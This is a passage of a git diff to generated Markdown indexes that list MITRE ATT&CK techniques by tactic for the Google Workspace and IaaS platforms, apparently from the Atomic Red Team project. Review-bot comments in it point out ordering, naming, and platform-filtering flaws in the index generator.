- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1485 Data Destruction [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1529 System Shutdown/Reboot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# initial-access
+- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# exfiltration
+- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.004 Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
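Review bot: the additions under `# credential-access`, `# discovery` and `# lateral-movement` include techniques that only apply to Windows hosts, which is surprising in an index whose only linked atomics carry the `[containers]` tag (Atomic Test #7 under T1069.001 and Atomic Test #9 under T1046); examples are `+- T1003.001 OS Credential Dumping: LSASS Memory`, `+- T1012 Query Registry` and `+- T1550.002 Use Alternate Authentication Material: Pass the Hash`. Please confirm the generator is still filtering techniques by ATT&CK platform before it emits the CONTRIBUTE A TEST placeholders, otherwise the index solicits tests that can never run on this platform. Two smaller points in the same hunk: under `# lateral-movement` the line `-- T1550.001 Application Access Token` is dropped while the parent T1550 stays and T1550.002/T1550.003 are added, so the commit message should say which ATT&CK mapping this follows; and `Remote Services:VNC` lacks the space after the colon that every other sub-technique name has, which is worth fixing in the source data rather than in the generated file.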
diff --git a/atomics/Indexes/Indexes-Markdown/google-workspace-index.md b/atomics/Indexes/Indexes-Markdown/google-workspace-index.md
index f5a5e15b11..2003c7f718 100644
--- a/atomics/Indexes/Indexes-Markdown/google-workspace-index.md
+++ b/atomics/Indexes/Indexes-Markdown/google-workspace-index.md
@@ -2,6 +2,7 @@
# credential-access
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
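Review bot: the new `+- T1110.002 Brute Force: Password Cracking` entry lands between T1539 and T1606.002 instead of next to T1110.001, which shows the generator writes each tactic's list in hash or insertion order; sorting by technique ID would keep future index regenerations to a minimal, reviewable diff. The line itself is fine.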
@@ -15,18 +16,20 @@
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-# impact
-- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+# collection
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.002 Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213.005 Messaging Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.008 Email Collection: Mailbox Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
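Review bot: the six removed entries at the top of this hunk (T1499.004, T1498.002, T1499.002, T1657, T1499, T1498) have no replacement within the hunk; only T1657 Financial Theft is visible being re-added further down under `# impact`, so confirm that dropping the T1498/T1499 denial-of-service techniques from the Google Workspace index is an intended platform-mapping change and not a side effect of the generator's filter. The inserted `# collection` block also lands ahead of `# defense-evasion` with its entries unordered (T1213.002 before T1114, T1213 after T1114.002) and inconsistently named (`T1213.002 Sharepoint` omits the parent prefix that `T1114.003 Email Collection: Email Forwarding Rule` carries); sorting entries by technique ID and normalising the name form would make these generated diffs reviewable.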
@@ -39,6 +42,7 @@
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1656 Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.008 Impair Defenses: Disable Cloud Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
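Review bot: the added `T1036.010 Masquerade Account Name` entry uses the bare sub-technique name, while the neighbouring `T1562.008 Impair Defenses: Disable Cloud Logs` uses the `Parent: Sub-technique` form; both come from the same generator, so the technique-name source should be normalised to one form before rendering.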
@@ -50,35 +54,45 @@
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1201 Password Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-# collection
-- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1114.002 Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+# lateral-movement
+- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
# persistence
+- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
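Review bot: `T1137.001 Office Application Startup: Office Template Macros.` carries a trailing period that no other entry has, which points at the technique-name source data and should be stripped before rendering. Separately, `T1566.004 Spearphishing Voice` is removed from `# initial-access` with no explanation while T1199 is added to the same section; and the `# collection` block deleted here is the same list the earlier hunk inserts above `# defense-evasion`, so this is a section move plus three new entries rather than a deletion. A deterministic section order in the generator would keep such moves out of the diff.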
@@ -90,6 +104,7 @@
- T1548.005 Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
@@ -100,14 +115,12 @@
- T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-# lateral-movement
-- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
# execution
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# impact
+- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
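Review bot: blank-line separators between tactic sections are now inconsistent: removing the empty line before `# execution` leaves that heading directly after the `T1537` entry, while the new `# impact` section does get one. The generator should emit the same separator before every heading. The `# lateral-movement` block removed here is the one re-inserted before `# initial-access` in the earlier hunk (with T1080 Taint Shared Content added), so again this is a reorder rather than a removal.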
diff --git a/atomics/Indexes/Indexes-Markdown/iaas-index.md b/atomics/Indexes/Indexes-Markdown/iaas-index.md
index df11ec0851..a29f9e89fe 100644
--- a/atomics/Indexes/Indexes-Markdown/iaas-index.md
+++ b/atomics/Indexes/Indexes-Markdown/iaas-index.md
@@ -1,189 +1,629 @@
# IaaS Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
-- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.011 Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.011 Signed Binary Proxy Execution: Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.012 File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216.001 Signed Script Proxy Execution: Pubprn [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1006 Direct Volume Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.005 Masquerading: Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.009 Impair Defenses: Safe Boot Mode [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.001 Virtualization/Sandbox Evasion: System Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.004 Signed Binary Proxy Execution: InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.007 Signed Binary Proxy Execution: Msiexec [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.003 Indicator Removal on Host: Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1202 Indirect Command Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.008 Email Collection: Mailbox Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.006 Indicator Removal on Host: Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480.002 Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.011 Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.003 Signed Binary Proxy Execution: CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.002 Impair Defenses: Disable Windows Event Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.002 Signed Binary Proxy Execution: Control Panel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.004 Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.015 Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1207 Rogue Domain Controller [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
